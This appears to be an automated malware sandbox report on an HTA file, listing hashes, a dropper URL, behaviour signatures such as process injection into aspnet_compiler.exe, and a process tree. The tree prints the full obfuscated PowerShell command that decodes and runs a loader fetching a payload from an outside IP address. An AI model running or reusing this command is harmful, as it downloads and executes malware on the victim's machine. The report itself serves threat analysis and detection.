b1b74b26bc36c5feb537a4331000b021f676b25c25e022a3b839e0da4c528160

General

Target

HYWJCXOPWTAZEKLLQJNWOYTQKEZVTKCTL.HTA
Size

127KB
MD5

42b4de0ca5875d7da480c73c7f4ffc71
SHA1

76840ba8cc6e55d74f09a88deb2de77861ef3405
SHA256

b1b74b26bc36c5feb537a4331000b021f676b25c25e022a3b839e0da4c528160
SHA512

571f3aec56f235b98c01732cfbe0d0fd641c12c53b720b06c324911aa0941796cae217fc3d4327bd3f77df49449f4e1d3ade00a98f025f4304dd12a4013eb81d

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://3.141.31.43/1/Serverkopl.txt

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

10 2340 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2340 set thread context of 3516 2340 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2340 powershell.exe
2340 powershell.exe
2340 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2340 powershell.exe

flow	pid	process
10	2340	powershell.exe

description	pid	process	target process
PID 2340 set thread context of 3516	2340	powershell.exe	aspnet_compiler.exe

pid	process
2340	powershell.exe
2340	powershell.exe
2340	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2340	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

mshta.exepowershell.exe

description	pid	process	target process
PID 2564 wrote to memory of 2340	2564	mshta.exe	powershell.exe
PID 2564 wrote to memory of 2340	2564	mshta.exe	powershell.exe
PID 2564 wrote to memory of 2340	2564	mshta.exe	powershell.exe
PID 2340 wrote to memory of 3516	2340	powershell.exe	aspnet_compiler.exe
PID 2340 wrote to memory of 3516	2340	powershell.exe	aspnet_compiler.exe
PID 2340 wrote to memory of 3516	2340	powershell.exe	aspnet_compiler.exe
PID 2340 wrote to memory of 3516	2340	powershell.exe	aspnet_compiler.exe
PID 2340 wrote to memory of 3516	2340	powershell.exe	aspnet_compiler.exe
PID 2340 wrote to memory of 3516	2340	powershell.exe	aspnet_compiler.exe
PID 2340 wrote to memory of 3516	2340	powershell.exe	aspnet_compiler.exe
PID 2340 wrote to memory of 3516	2340	powershell.exe	aspnet_compiler.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\HYWJCXOPWTAZEKLLQJNWOYTQKEZVTKCTL.HTA" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Suspicious use of WriteProcessMemory
PID:2564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'http://3.141.31.43/1/Serverkopl.txt' ; -JoiN(( 100100,1001000,1000010 ,111101,101000,100111,1111011,110010,1111101, 1111011 , 110000 ,1111101,1111011 ,110001 , 1111101 , 100111 , 100000,101101 , 1100110,100111, 101101, 101101,101101 , 101101 ,101101 ,101101,101101,101101 ,101101,1101100 ,101101 ,101101, 101101 ,101101 ,101101 ,101101 ,101101,101101 ,101101 ,1101111,101101, 101101 ,101101,101101 , 101101 ,101101 , 101101,101101,101101 ,1100001,101101, 101101,101101, 101101,101101 , 101101 , 101101,101101,101101, 1100100 ,101101 , 101101,101101 ,101101, 101101, 101101,101101 ,101101 , 101101 ,100111, 101110,1010010 , 1100101, 1110000, 1101100 ,1100001, 1100011,1100101, 101000, 100111,101101, 101101,101101 , 101101 , 101101 , 101101 ,101101 ,101101 , 101101 ,100111,101100 ,100111 ,100111, 101001 ,101100,100111, 101010 ,101010, 101010 ,101010 , 101010,101010, 101010 ,101010 , 101010, 101010 , 1110011, 101010, 101010,101010, 101010 ,101010 , 101010 , 101010, 101010, 101010, 101010,1110100 , 101010, 101010 , 101010,101010,101010,101010,101010 , 101010,101010 ,101010,1110010, 101010 ,101010 ,101010 , 101010 , 101010 , 101010, 101010, 101010, 101010,101010,1101001, 101010, 101010, 101010,101010 ,101010 ,101010 ,101010, 101010, 101010 , 101010, 1101110, 101010 , 101010 ,101010 ,101010 , 101010, 101010, 101010 , 101010 ,101010, 101010 , 1100111,101010,101010, 101010, 101010 , 101010 ,101010 , 101010, 101010,101010,101010,100111 ,101110,1010010 ,1100101, 1110000,1101100, 1100001 ,1100011 , 1100101,101000,100111, 101010 ,101010, 101010, 101010, 101010 ,101010 ,101010 ,101010 , 101010 , 101010 , 100111 , 101100 , 100111,100111, 101001 , 101100 , 100111 ,101011 , 101011,101011 , 101011, 101011 ,101011 , 101011 ,101011 , 101011 , 101011,1000100 , 101011 , 101011 ,101011 ,101011 , 101011, 101011,101011 ,101011 , 101011 ,101011, 1101111 ,101011 ,101011 , 101011 , 101011 ,101011 ,101011,101011,101011,101011,101011 ,1110111, 101011,101011, 101011 ,101011 ,101011 , 101011, 101011 ,101011 ,101011, 101011 ,1101110 , 101011 ,101011,101011,101011,101011, 101011, 101011,101011 , 101011 ,101011 , 100111 , 101110, 1010010 ,1100101 ,1110000 , 1101100 ,1100001 ,1100011, 1100101 , 101000 ,100111, 101011, 101011, 101011, 101011 , 101011,101011,101011,101011 , 101011, 101011, 100111 , 101100 , 100111 , 100111, 101001 ,101001, 1101 , 1010, 100100 ,1001000 , 1000010,1000010,111101,101000 ,100111 ,1111011 , 110010, 1111101, 1111011,110000,1111101 , 1111011,110001,1111101, 100111 , 100000 ,101101,1100110,100111,101101,101101 , 101101,101101 , 101101, 101101,101101 , 101101,101101, 1100101, 101101 , 101101, 101101 ,101101,101101, 101101,101101,101101, 101101,1100010 , 101101 , 101101,101101,101101 ,101101, 101101,101101 ,101101,101101 , 1000011 , 101101,101101,101101 , 101101 ,101101 , 101101, 101101,101101, 101101, 1101100,101101 , 101101 , 101101, 101101,101101 ,101101 , 101101 , 101101 ,101101, 100111,101110 , 1010010, 1100101, 1110000 ,1101100,1100001,1100011 ,1100101 ,101000,100111 ,101101 ,101101, 101101 ,101101 ,101101, 101101 ,101101 ,101101,101101,100111 ,101100, 100111 , 100111, 101001 ,101100,100111, 101101 , 101101 ,101101 ,101101 , 101101 , 101101 , 101101 , 101101 ,101101,1101001,101101,101101,101101 ,101101,101101, 101101,101101,101101, 101101,1100101, 101101,101101,101101 ,101101 ,101101 , 101101 ,101101 ,101101 ,101101 ,1101110, 101101, 101101 , 101101,101101 , 101101,101101 , 101101 ,101101 ,101101,1110100 , 101101,101101, 101101 , 101101 , 101101,101101 ,101101 ,101101, 101101, 100111 , 101110, 1010010 , 1100101 ,1110000, 1101100 , 1100001,1100011 , 1100101 , 101000, 100111,101101 ,101101 ,101101,101101 , 101101 ,101101 ,101101, 101101, 101101 ,100111, 101100,100111 , 100111 ,101001,101100, 100111,101101 ,101101, 101101 , 101101,101101, 101101,101101, 101101, 101101 , 1001110, 1100101, 101101,101101 ,101101 , 101101,101101 , 101101,101101, 101101 ,101101 ,1110100,101101 , 101101, 101101 ,101101,101101, 101101 , 101101, 101101,101101, 101110 ,1010111,101101,101101 , 101101, 101101, 101101 , 101101,101101 , 101101,101101 , 100111 , 101110, 1010010, 1100101, 1110000 , 1101100 ,1100001 , 1100011, 1100101,101000,100111 ,101101 ,101101,101101 ,101101 ,101101, 101101, 101101 ,101101,101101 ,100111 , 101100 , 100111 ,100111, 101001 , 101001 ,1101 ,1010 ,100100,1001000,1000010 , 1000010 , 1000010 ,111101,101000,100111,1111011,110010 ,1111101 ,1111011,110000,1111101,1111011, 110001,1111101 ,100111 ,100000 , 101101 , 1100110, 100111,101101 , 101101,101101,101101 , 101101,101101 ,1110111 , 101101 , 1001111, 101101 , 101101 ,101101, 101101 , 101101 ,101101 , 1100010, 101101, 101101, 101101, 101101,101101, 101101,1101010 ,101101 , 101101 , 101101 ,101101,101101 , 101101 ,1100101,101101 ,101101, 101101, 101101 , 101101, 101101 , 1100011, 101101, 101101,101101,101101 , 101101 , 101101 ,1110100,100000,100000,100100,101101 , 101101, 101101, 101101,101101,101101, 1001000,101101, 101101,101101 , 101101 ,101101 , 101101,100111 , 101110 ,1010010 , 1100101 ,1110000, 1101100 , 1100001,1100011 ,1100101,101000, 100111,101101, 101101 ,101101, 101101 , 101101,101101, 100111 ,101100 , 100111,100111 ,101001 ,101100 , 100111 , 101101 , 101101 ,101101 , 101101 ,101101 , 101101 , 1000010, 1000010, 101101 ,101101, 101101 , 101101 , 101101, 101101,101001 , 101110 , 100100 ,1001000,101101,101101, 101101 ,101101 , 101101,101101,1000010 , 101000, 101101 , 101101,101101 , 101101 ,101101 ,101101 , 100100, 1001000,101101 , 101101, 101101,101101, 101101, 101101, 1111000 , 101001,101101, 101101, 101101, 101101 ,101101 ,101101 , 100111 , 101110 , 1010010, 1100101, 1110000 ,1101100, 1100001 , 1100011 ,1100101 , 101000,100111, 101101 , 101101,101101, 101101,101101,101101 , 100111,101100,100111 ,100111,101001 ,101100 , 100111 , 101101,101101, 101101, 101101, 101101,101101, 1001001, 101101,101101, 101101, 101101,101101 , 101101, 1100000, 1000101 ,101101 , 101101 , 101101 ,101101 ,101101 ,101101 ,1100000, 1011000 ,101000, 101101,101101 , 101101,101101,101101 ,101101 , 1001110,1100101,101101 , 101101,101101, 101101,101101,101101, 100111 , 101110 ,1010010,1100101,1110000 ,1101100 ,1100001,1100011,1100101,101000 ,100111 , 101101, 101101,101101 ,101101, 101101 , 101101 , 100111 ,101100 , 100111, 100111 , 101001 ,101001, 1101 ,1010,100100,1001000, 1000010,1000010,1000010 ,1000010 ,1000010 ,100000 ,111101 , 100000, 101000, 100100 ,1001000 ,1000010, 1000010 , 1000010 ,100000 , 101101, 1001010,1101111 ,1101001,1101110 , 100000, 100111 , 100111 ,101001 ,1111100,1001001,1100000 ,1000101,1100000 , 1011000)| foReAcH-obJeCt{( [CHaR] ( [conveRT]::ToiNT16(([StriNG]$_ ) ,2 )))})|& ((get-variabLe '*Mdr*').NaMe[3,11,2]-JoiN'')
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2340

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:3516

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2340-117-0x0000000004D90000-0x0000000004DC6000-memory.dmp

Filesize
216KB

Download
memory/2340-118-0x0000000007960000-0x0000000007F88000-memory.dmp

Filesize
6.2MB

Download
memory/2340-119-0x0000000007320000-0x0000000007321000-memory.dmp

Filesize
4KB

Download
memory/2340-120-0x0000000007322000-0x0000000007323000-memory.dmp

Filesize
4KB

Download
memory/2340-121-0x00000000077E0000-0x0000000007802000-memory.dmp

Filesize
136KB

Download
memory/2340-122-0x0000000007890000-0x00000000078F6000-memory.dmp

Filesize
408KB

Download
memory/2340-123-0x00000000081A0000-0x0000000008206000-memory.dmp

Filesize
408KB

Download
memory/2340-124-0x0000000008210000-0x0000000008560000-memory.dmp

Filesize
3.3MB

Download
memory/2340-125-0x0000000007900000-0x000000000791C000-memory.dmp

Filesize
112KB

Download
memory/2340-126-0x0000000008660000-0x00000000086AB000-memory.dmp

Filesize
300KB

Download
memory/2340-127-0x00000000088F0000-0x0000000008966000-memory.dmp

Filesize
472KB

Download
memory/2340-134-0x000000000A020000-0x000000000A698000-memory.dmp

Filesize
6.5MB

Download
memory/2340-135-0x0000000009680000-0x000000000969A000-memory.dmp

Filesize
104KB

Download
memory/2340-136-0x0000000007323000-0x0000000007324000-memory.dmp

Filesize
4KB

Download
memory/2340-137-0x00000000096E0000-0x00000000096EE000-memory.dmp

Filesize
56KB

Download
memory/3516-138-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/3516-140-0x0000000005780000-0x0000000005781000-memory.dmp

Filesize
4KB

Download
memory/3516-141-0x0000000005830000-0x00000000058CC000-memory.dmp

Filesize
624KB

Download
memory/3516-142-0x0000000005DD0000-0x00000000062CE000-memory.dmp

Filesize
5.0MB

Download

Analysis

Sharing